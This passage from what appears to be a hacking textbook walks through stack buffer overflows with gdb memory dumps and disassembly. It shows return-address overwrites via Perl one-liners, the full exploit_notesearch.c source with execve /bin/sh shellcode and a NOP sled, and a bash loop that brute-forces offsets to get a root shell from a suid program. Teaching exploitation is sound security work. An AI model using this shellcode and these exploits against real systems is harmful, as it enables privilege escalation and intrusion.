0xbffff7d0:     0xb7ff47b0      0x08048510      0xbffff7e8      0x080484bb
0xbffff7e0:     0xbffff9b7      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) p 0xbffff7e0 - 0xbffff7a0
$1 = 64
(gdb) x/s password_buffer
0xbffff7c0:      "?o??\200????????o???G??\020\205\004\b?????\204\004\b????\020\205\004\
bH???????\002"
(gdb) x/x &auth_flag
0xbffff7bc:     0x00000000
(gdb)

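Continuing to the second breakpoint in check_authentication(), a stack frame is pushed onto the stack when the function is called. Since the stack grows upward toward lower memory addresses, the stack pointer is now 64 bytes lower, at 0xbffff7a0. The size and structure of a stack frame can vary greatly, depending on the function and certain compiler optimizations. For example, the first 24 bytes of this stack frame are just padding put there by the compiler. The local stack variables, auth_flag and password_buffer, are shown at their respective memory locations in the stack frame: auth_flag at 0xbffff7bc, and the 16 bytes of password_buffer starting at 0xbffff7c0.

The stack frame contains more than just the local variables and padding. Elements of the check_authentication() stack frame are shown below.

First comes the memory saved for the local variables. This starts at the auth_flag variable at 0xbffff7bc and continues through the end of the 16-byte password_buffer variable at 0xbffff7cf. The next few values on the stack are just padding the compiler added, plus something called the saved frame pointer. If the program is compiled with the optimization flag -fomit-frame-pointer, the frame pointer won't be used in the stack frame. At 0xbffff7dc, the value 0x080484bb is the return address of the stack frame, and at 0xbffff7e0, the address 0xbffff9b7 is a pointer to a string containing 30 As. This must be the argument to the check_authentication() function.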

(gdb) x/32xw $esp
0xbffff7a0:     0x00000000      0x08049744      0xbffff7b8      0x080482d9
0xbffff7b0:     0xb7f9f729      0xb7fd6ff4      0xbffff7e8      0x00000000
0xbffff7c0:     0xb7fd6ff4      0xbffff880      0xbffff7e8      0xb7fd6ff4
0xbffff7d0:     0xb7ff47b0      0x08048510      0xbffff7e8      0x080484bb
0xbffff7e0:     0xbffff9b7      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) x/32xb 0xbffff9b7
0xbffff9b7:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff9bf:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff9c7:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff9cf:     0x41    0x41    0x41    0x41    0x41    0x41    0x00    0x53
(gdb) x/s 0xbffff9b7
0xbffff9b7:      'A' <repeats 30 times> 
(gdb)

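The return address in a stack frame can be located by understanding how the stack frame is created. This process begins in the main() function, even before the function call.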

(gdb) disass main
Dump of assembler code for function main:
0x08048474 <main+0>:    push   ebp
0x08048475 <main+1>:    mov    ebp,esp
0x08048477 <main+3>:    sub    esp,0x8
0x0804847a <main+6>:    and    esp,0xfffffff0
0x0804847d <main+9>:    mov    eax,0x0
0x08048482 <main+14>:   sub    esp,eax
0x08048484 <main+16>:   cmp    DWORD PTR [ebp+8],0x1
0x08048488 <main+20>:   jg     0x80484ab <main+55>
0x0804848a <main+22>:   mov    eax,DWORD PTR [ebp+12]
0x0804848d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804848f <main+27>:   mov    DWORD PTR [esp+4],eax
0x08048493 <main+31>:   mov    DWORD PTR [esp],0x80485e5
0x0804849a <main+38>:   call   0x804831c <printf@plt>
0x0804849f <main+43>:   mov    DWORD PTR [esp],0x0
0x080484a6 <main+50>:   call   0x804833c <exit@plt>
0x080484ab <main+55>:   mov    eax,DWORD PTR [ebp+12]
0x080484ae <main+58>:   add    eax,0x4
0x080484b1 <main+61>:   mov    eax,DWORD PTR [eax]
0x080484b3 <main+63>:   mov    DWORD PTR [esp],eax
0x080484b6 <main+66>:   call   0x8048414 <check_authentication>
0x080484bb <main+71>:   test   eax,eax
0x080484bd <main+73>:   je     0x80484e5 <main+113>
0x080484bf <main+75>:   mov    DWORD PTR [esp],0x80485fb
0x080484c6 <main+82>:   call   0x804831c <printf@plt>
0x080484cb <main+87>:   mov    DWORD PTR [esp],0x8048619
0x080484d2 <main+94>:   call   0x804831c <printf@plt>
0x080484d7 <main+99>:   mov    DWORD PTR [esp],0x8048630
0x080484de <main+106>:  call   0x804831c <printf@plt>
0x080484e3 <main+111>:  jmp    0x80484f1 <main+125>
0x080484e5 <main+113>:  mov    DWORD PTR [esp],0x804864d
0x080484ec <main+120>:  call   0x804831c <printf@plt>
0x080484f1 <main+125>:  leave
0x080484f2 <main+126>:  ret
End of assembler dump.
(gdb)

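Notice the two instructions at main+63 and main+66 in the listing above. At this point, the EAX register contains a pointer to the first command-line argument. This is also the argument to check_authentication(). The first of these instructions writes EAX to where ESP is pointing (the top of the stack). This starts the stack frame for check_authentication() with the function argument. The second instruction is the actual call. It pushes the address of the next instruction onto the stack and moves the execution pointer register (EIP) to the start of the check_authentication() function. The address pushed onto the stack is the return address for the stack frame. In this case, the address of the next instruction is 0x080484bb, so that is the return address.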

(gdb) disass check_authentication
Dump of assembler code for function check_authentication:
0x08048414 <check_authentication+0>:    push   ebp
0x08048415 <check_authentication+1>:    mov    ebp,esp
0x08048417 <check_authentication+3>:    sub    esp,0x38

...

0x08048472 <check_authentication+94>:   leave
0x08048473 <check_authentication+95>:   ret
End of assembler dump.
(gdb) p 0x38
$3 = 56
(gdb) p 0x38 + 4 + 4
$4 = 64
(gdb)

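Execution continues into the check_authentication() function as EIP is changed, and the first few instructions (the push, mov, and sub at the top of the listing above) finish reserving memory for the stack frame. These instructions are known as the function prologue. The first two instructions deal with the saved frame pointer, and the third subtracts 0x38 from ESP. This reserves 56 bytes for the local variables of the function. The return address and the saved frame pointer have already been pushed onto the stack and account for the additional 8 bytes of the 64-byte stack frame.

When the function finishes, the leave and ret instructions remove the stack frame and set the execution pointer register (EIP) to the saved return address in the stack frame (0x080484bb, stored at 0xbffff7dc). This brings program execution back to the instruction in main() that follows the function call, at 0x080484bb. This process happens with every function call in any program.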

(gdb) x/32xw $esp
0xbffff7a0:     0x00000000      0x08049744      0xbffff7b8      0x080482d9
0xbffff7b0:     0xb7f9f729      0xb7fd6ff4      0xbffff7e8      0x00000000
0xbffff7c0:     0xb7fd6ff4      0xbffff880      0xbffff7e8      0xb7fd6ff4
0xbffff7d0:     0xb7ff47b0      0x08048510      0xbffff7e8      0x080484bb
0xbffff7e0:     0xbffff9b7      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) cont
Continuing.

Breakpoint 3, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)
    at auth_overflow2.c:16
16              return auth_flag;
(gdb) x/32xw $esp
0xbffff7a0:     0xbffff7c0      0x080485dc      0xbffff7b8      0x080482d9
0xbffff7b0:     0xb7f9f729      0xb7fd6ff4      0xbffff7e8      0x00000000
0xbffff7c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7d0:     0x41414141      0x41414141      0x41414141      0x08004141
0xbffff7e0:     0xbffff9b7      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()
(gdb)

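When some of the bytes of the saved return address are overwritten, the program will still try to use that value to restore the execution pointer register (EIP). This usually results in a crash, since execution is essentially jumping to a random location. But this value doesn't need to be random. If the overwrite is controlled, execution can, in turn, be controlled to jump to a specific location. But where should we tell it to go?

Experimenting with BASH

Since so much of hacking is rooted in exploitation and experimentation, the ability to quickly try different things is vital. The BASH shell and Perl are common on most machines and are all that is needed to experiment with exploitation.

Perl is an interpreted programming language with a print command that happens to be particularly well suited to generating long sequences of characters. Perl can execute instructions on the command line through the -e switch, like this: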

reader@hacking:~/booksrc $ perl -e 'print "A" x 20;'
AAAAAAAAAAAAAAAAAAAA

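This command tells Perl to execute the commands found between the single quotes, in this case the single command print "A" x 20;. This command prints the character A 20 times.

Any character, including a nonprintable one, can also be printed by using \x##, where ## is the hexadecimal value of the character. In the following example, this notation is used to print the character A, which has the hexadecimal value 0x41.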

reader@hacking:~/booksrc $ perl -e 'print "\x41" x 20;'
AAAAAAAAAAAAAAAAAAAA

In addition, string concatenation can be done in Perl with a period (.). This can be useful when stringing multiple addresses together.

reader@hacking:~/booksrc $ perl -e 'print "A"x20 . "BCD" . "\x61\x66\x67\x69"x2 . "Z";'
AAAAAAAAAAAAAAAAAAAABCDafgiafgiZ

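An entire shell command can be executed like a function, with its output returned in place. This is done by surrounding the command with parentheses and prefixing a dollar sign. Here are two examples: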

reader@hacking:~/booksrc $ $(perl -e 'print "uname";')
Linux
reader@hacking:~/booksrc $ una$(perl -e 'print "m";')e
Linux
reader@hacking:~/booksrc $

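In each case, the output of the command found between the parentheses is substituted in place of the command, and the resulting uname command is executed. The same command-substitution effect can be achieved with grave accent marks (`, the slanted single quote on the tilde key). Use whichever syntax feels more natural to you; however, most people find the parentheses syntax easier to read.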

reader@hacking:~/booksrc $ u`perl -e 'print "na";'`me
Linux
reader@hacking:~/booksrc $ u$(perl -e 'print "na";')me
Linux
reader@hacking:~/booksrc $

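Command substitution and Perl can be combined to quickly generate overflow buffers on the fly. You can use this technique to easily test the overflow_example.c program with buffers of precise lengths.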

reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x30')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 30 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)
Segmentation fault (core dumped)
reader@hacking:~/booksrc $ gdb -q
(gdb) print 0xbffff7f4 - 0xbffff7e0
$1 = 20

(gdb) quit
reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x20 . "ABCD"')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 24 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAABCD'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAABCD'
[AFTER] value is at 0xbffff7f4 and is 1145258561 (0x44434241) 
reader@hacking:~/booksrc $

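In the output above, GDB is used as a hexadecimal calculator to figure out the distance between buffer_two (0xbffff7e0) and the value variable (0xbffff7f4), which turns out to be 20 bytes. Using this distance, the value variable is overwritten with the exact value 0x44434241, since the characters A, B, C, and D have the hex values 0x41, 0x42, 0x43, and 0x44, respectively. The first character is the least significant byte, due to the little-endian architecture. This means that if you want to set the value variable to something exact, like 0xdeadbeef, you must write those bytes into memory in reverse order.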

reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x20 .
 "\xef\xbe\xad\xde"')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 24 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAA??'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAA??'
[AFTER] value is at 0xbffff7f4 and is -559038737 (0xdeadbeef)
reader@hacking:~/booksrc $

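This technique can be applied to overwrite the return address in the auth_overflow2.c program with an exact value. In the example below, we will overwrite the return address with a different address in main().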

reader@hacking:~/booksrc $ gcc -g -o auth_overflow2 auth_overflow2.c 
reader@hacking:~/booksrc $ gdb -q ./auth_overflow2
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x08048474 <main+0>:    push   ebp
0x08048475 <main+1>:    mov    ebp,esp
0x08048477 <main+3>:    sub    esp,0x8
0x0804847a <main+6>:    and    esp,0xfffffff0
0x0804847d <main+9>:    mov    eax,0x0
0x08048482 <main+14>:   sub    esp,eax
0x08048484 <main+16>:   cmp    DWORD PTR [ebp+8],0x1
0x08048488 <main+20>:   jg     0x80484ab <main+55>
0x0804848a <main+22>:   mov    eax,DWORD PTR [ebp+12]
0x0804848d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804848f <main+27>:   mov    DWORD PTR [esp+4],eax
0x08048493 <main+31>:   mov    DWORD PTR [esp],0x80485e5
0x0804849a <main+38>:   call   0x804831c <printf@plt>
0x0804849f <main+43>:   mov    DWORD PTR [esp],0x0
0x080484a6 <main+50>:   call   0x804833c <exit@plt>
0x080484ab <main+55>:   mov    eax,DWORD PTR [ebp+12]
0x080484ae <main+58>:   add    eax,0x4
0x080484b1 <main+61>:   mov    eax,DWORD PTR [eax]
0x080484b3 <main+63>:   mov    DWORD PTR [esp],eax
0x080484b6 <main+66>:   call   0x8048414 <check_authentication>
0x080484bb <main+71>:   test   eax,eax
0x080484bd <main+73>:   je     0x80484e5 <main+113>
0x080484bf <main+75>:   mov    DWORD PTR [esp],0x80485fb
0x080484c6 <main+82>:   call   0x804831c <printf@plt>
0x080484cb <main+87>:   mov    DWORD PTR [esp],0x8048619
0x080484d2 <main+94>:   call   0x804831c <printf@plt>
0x080484d7 <main+99>:   mov    DWORD PTR [esp],0x8048630
0x080484de <main+106>:  call   0x804831c <printf@plt>
0x080484e3 <main+111>:  jmp    0x80484f1 <main+125>
0x080484e5 <main+113>:  mov    DWORD PTR [esp],0x804864d
0x080484ec <main+120>:  call   0x804831c <printf@plt>
0x080484f1 <main+125>:  leave
0x080484f2 <main+126>:  ret
End of assembler dump.
(gdb)

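The instructions from main+75 through main+106 are the ones that display the Access Granted message. This section begins at 0x080484bf, so if the return address is overwritten with this value, this block of instructions will be executed. The exact distance between the return address and the start of password_buffer can change with different compiler versions and different optimization flags. As long as the start of the buffer is aligned with DWORDs on the stack, this variability can be accounted for by simply repeating the return address many times. This way, at least one of the copies will overwrite the return address, even if it has shifted around due to compiler optimizations.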

reader@hacking:~/booksrc $ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10')

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Segmentation fault (core dumped)
reader@hacking:~/booksrc $

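In the example above, the target address 0x080484bf is repeated 10 times to ensure the return address is overwritten with the new target address. When the check_authentication() function returns, execution jumps directly to the new target address instead of returning to the instruction after the call. This gives us more control; however, we are still limited to using instructions that exist in the original program.

The notesearch program is vulnerable to a buffer overflow on the strcpy() line shown here.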

int main(int argc, char *argv[]) {
   int userid, printing=1, fd; // File descriptor
   char searchstring[100];

   if(argc > 1)                        // If there is an arg
      strcpy(searchstring, argv[1]);   //   that is the search string;
   else                                // otherwise,
      searchstring[0] = 0;             //   search string is empty.

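The notesearch exploit uses a similar technique to overflow a buffer into the return address; however, it also injects its own instructions into memory and then returns execution there. These instructions are called shellcode, and they tell the program to restore privileges and open a shell prompt. This is especially devastating for the notesearch program, since it is suid root. Because this program expects multiuser access, it runs under higher privileges so it can access its data file, but the program logic prevents the user from using these higher privileges for anything other than accessing the data file. At least, that is the intention.

But when new instructions can be injected and execution can be controlled with a buffer overflow, the program logic is meaningless. This technique allows the program to do things it was never programmed to do, while it is still running with elevated privileges. This is the dangerous combination that allows the notesearch exploit to gain a root shell. Let's examine the exploit further.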

reader@hacking:~/booksrc $ gcc -g exploit_notesearch.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4       char shellcode[]=
5       "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
6       "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
7       "\xe1\xcd\x80";
8
9       int main(int argc, char *argv[]) {
10         unsigned int i, *ptr, ret, offset=270;
(gdb)
11         char *command, *buffer;
12
13         command = (char *) malloc(200);
14         bzero(command, 200); // Zero out the new memory.
15
16         strcpy(command, "./notesearch \'"); // Start command buffer.
17         buffer = command + strlen(command); // Set buffer at the end.
18
19         if(argc > 1) // Set offset.
20            offset = atoi(argv[1]);
(gdb)
21
22         ret = (unsigned int) &i - offset; // Set return address.
23
24         for(i=0; i < 160; i+=4) // Fill buffer with return address.
25            *((unsigned int *)(buffer+i)) = ret;
26         memset(buffer, 0x90, 60); // Build NOP sled.
27         memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
28
29         strcat(command, "\'");
30
(gdb) break 26
Breakpoint 1 at 0x80485fa: file exploit_notesearch.c, line 26.
(gdb) break 27
Breakpoint 2 at 0x8048615: file exploit_notesearch.c, line 27.
(gdb) break 28
Breakpoint 3 at 0x8048633: file exploit_notesearch.c, line 28.
(gdb)

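The notesearch exploit generates a buffer in lines 24 through 27 of the listing above. The first part is a for loop that fills the buffer with the 4-byte address stored in the ret variable. The loop increments i by 4 each time. This value is added to the buffer address, and the whole thing is typecast as an unsigned integer pointer. An unsigned integer has a size of 4, so when the pointer is dereferenced, the entire 4-byte value found in ret is written.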

(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:26
26         memset(buffer, 0x90, 60); // build NOP sled
(gdb) x/40x buffer
0x804a016:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a026:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a036:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a046:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a056:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a066:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a076:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a086:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a096:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a0a6:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
(gdb) x/s command
0x804a008:       "./notesearch
'¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶û
ÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

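At the first breakpoint, the buffer pointer shows the result of the for loop. You can also see the relationship between the command pointer and the buffer pointer. The next instruction is a call to memset(), which starts at the beginning of the buffer and sets 60 bytes of memory to the value 0x90.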

(gdb) cont
Continuing.

Breakpoint 2, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:27
27         memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 
(gdb) x/40x buffer
0x804a016:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a026:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a036:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a046:      0x90909090      0x90909090      0x90909090      0xbffff6f6
0x804a056:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a066:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a076:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a086:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a096:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a0a6:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
(gdb) x/s command 
0x804a008:       "./notesearch '", '\220' <repeats 60 times>, "¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿
¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

Finally, the call to memcpy() copies the shellcode bytes to buffer+60.

(gdb) cont
Continuing.

Breakpoint 3, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:29
29         strcat(command, "\'");
(gdb) x/40x buffer
0x804a016:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a026:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a036:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a046:      0x90909090      0x90909090      0x90909090      0x3158466a
0x804a056:      0xcdc931db      0x2f685180      0x6868732f      0x6e69622f
0x804a066:      0x5351e389      0xb099e189      0xbf80cd0b      0xbffff6f6
0x804a076:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a086:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a096:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a0a6:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
(gdb) x/s command
0x804a008:       "./notesearch '", '\220' <repeats 60 times>, "1À1Û1É\231°gÍ\200j\vXQh//shh/
bin\211ãQ\211âS\211áÍ\200¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

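Now the buffer contains the desired shellcode and should be long enough to overwrite the return address. The difficulty of finding the exact location of the return address is eased by the repeated return address technique. But this return address must point to the shellcode located in the same buffer. This means the actual address must be known ahead of time, before it even goes into memory. This can be a difficult prediction to make with a dynamically changing stack.

Fortunately, there is another hacking technique, called the NOP sled, that can help with this difficult chicanery. NOP is an assembly instruction that is short for no operation. It is a single-byte instruction that does absolutely nothing. These instructions are sometimes used to waste computational cycles for timing purposes and are actually necessary in the SPARC processor architecture, due to instruction pipelining. In this case, NOP instructions are going to be used for a different purpose: as a fudge factor. We'll create a large array (or sled) of these NOP instructions and place it before the shellcode; then, if the EIP register points to any address found in the NOP sled, it will increment while executing each NOP instruction, one at a time, until it finally reaches the shellcode. This means that as long as the return address is overwritten with any address found in the NOP sled, the EIP register will slide down the sled to the shellcode, which will execute properly. On the x86 architecture, the NOP instruction is equivalent to the hex byte 0x90. This means our completed exploit buffer looks something like this:

Figure 0x300-2. Layout of the exploit buffer: NOP sled, then shellcode, then the repeated return address.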

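Even with a NOP sled, the approximate location of the buffer in memory must be predicted in advance. One technique for approximating the memory location is to use a nearby stack location as a frame of reference. By subtracting an offset from this location, the relative address of any variable can be obtained.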

From exploit_notesearch.c

  unsigned int i, *ptr, ret, offset=270;
  char *command, *buffer;

  command = (char *) malloc(200);
  bzero(command, 200); // Zero out the new memory.

  strcpy(command, "./notesearch \'"); // Start command buffer.
  buffer = command + strlen(command); // Set buffer at the end.

  if(argc > 1) // Set offset.
    offset = atoi(argv[1]);

  ret = (unsigned int) &i - offset; // Set return address.

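In the notesearch exploit, the address of the variable i in main()'s stack frame is used as a point of reference. Then an offset is subtracted from that value; the result is the target return address. This offset was previously determined to be 270, but how is this number calculated?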

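The easiest way to determine this offset is experimentally. The debugger shifts memory around slightly and drops privileges when the suid root notesearch program is executed, which makes debugging much less useful in this case.

Since the notesearch exploit accepts an optional command-line argument that defines the offset, different offsets can be tested quickly.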

reader@hacking:~/booksrc $ gcc exploit_notesearch.c
reader@hacking:~/booksrc $ ./a.out 100
-------[ end of note data ]-------
reader@hacking:~/booksrc $ ./a.out 200
-------[ end of note data ]-------
reader@hacking:~/booksrc $

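However, doing this manually is tedious and stupid. BASH also has a for loop that can be used to automate this process. The seq command is a simple program that generates sequences of numbers and is typically used with looping.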

reader@hacking:~/booksrc $ seq 1 10
1
2
3
4
5
6
7
8
9
10
reader@hacking:~/booksrc $ seq 1 3 10
1
4
7
10
reader@hacking:~/booksrc $

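When only two arguments are used, all the numbers from the first argument to the second are generated. When three arguments are used, the middle argument dictates how much to increment each time. This can be used with command substitution to drive BASH's for loop.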

reader@hacking:~/booksrc $ for i in $(seq 1 3 10)
> do
> echo The value is $i
> done
The value is 1
The value is 4
The value is 7
The value is 10
reader@hacking:~/booksrc $

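The function of the for loop should be familiar, even if the syntax is a little different. The shell variable $i iterates through all the values generated by seq. Then everything between the do and done keywords is executed. This can be used to quickly test many different offsets. Since the NOP sled is 60 bytes long, and we can return anywhere on the sled, there are about 60 bytes of wiggle room. We can safely increment the offset in steps of 30 with no danger of missing the sled.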

reader@hacking:~/booksrc $ for i in $(seq 0 30 300)
> do
> echo Trying offset $i
> ./a.out $i
> done
Trying offset 0
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999

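When the right offset is used, the return address is overwritten with a value that points somewhere on the NOP sled. When execution tries to return to that location, it just slides down the NOP sled into the injected shellcode instructions. This is how the default offset value was discovered.

Using the Environment

Sometimes a buffer will be too small to hold even shellcode. Fortunately, there are other locations in memory where shellcode can be stashed. Environment variables are used by the user shell for a variety of purposes, but what they are used for matters less than the fact that they are located on the stack and can be set from the shell. The example below sets an environment variable called MYVAR to the string test. This environment variable can be accessed by prepending a dollar sign to its name. In addition, the env command shows all the environment variables. Notice that several default environment variables are already set.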

reader@hacking:~/booksrc $ export MYVAR=test
reader@hacking:~/booksrc $ echo $MYVAR
test
reader@hacking:~/booksrc $ env
SSH_AGENT_PID=7531
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
TERM=xterm
GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2
WINDOWID=39845969
OLDPWD=/home/reader
USER=reader
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;
01:or=4
0;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:
*.arj=01;
31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:
*.deb=01;31:*
.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:
*.pgm=01;35
:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:
*.mov=01;
35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:
*.xwd=01;
35:*.flac=01;35:*.mp3=01;35:*.mpc=01;35:*.ogg=01;35:*.wav=01;35:
SSH_AUTH_SOCK=/tmp/ssh-EpSEbS7489/agent.7489
GNOME_KEYRING_SOCKET=/tmp/keyring-AyzuEi/socket
SESSION_MANAGER=local/hacking:/tmp/.ICE-unix/7489
USERNAME=reader
DESKTOP_SESSION=default.desktop
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
GDM_XSERVER_LOCATION=local
PWD=/home/reader/booksrc
LANG=en_US.UTF-8
GDMSESSION=default.desktop
HISTCONTROL=ignoreboth
HOME=/home/reader
SHLVL=1
GNOME_DESKTOP_SESSION_ID=Default
LOGNAME=reader
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-
DxW6W1OH1O,guid=4f4e0e9cc6f68009a059740046e28e35
LESSOPEN=| /usr/bin/lesspipe %s
DISPLAY=:0.0
`MYVAR=test`
LESSCLOSE=/usr/bin/lesspipe %s %s
RUNNING_UNDER_GDM=yes
COLORTERM=gnome-terminal
XAUTHORITY=/home/reader/.Xauthority
_=/usr/bin/env
reader@hacking:~/booksrc $

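Similarly, the shellcode can be put in an environment variable, but first it needs to be in a form we can easily manipulate. The shellcode from the notesearch exploit can be used; we just need to put it into a file in binary form. The standard shell tools head, grep, and cut can be used to isolate just the hex-expanded bytes of the shellcode.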

reader@hacking:~/booksrc $ head exploit_notesearch.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
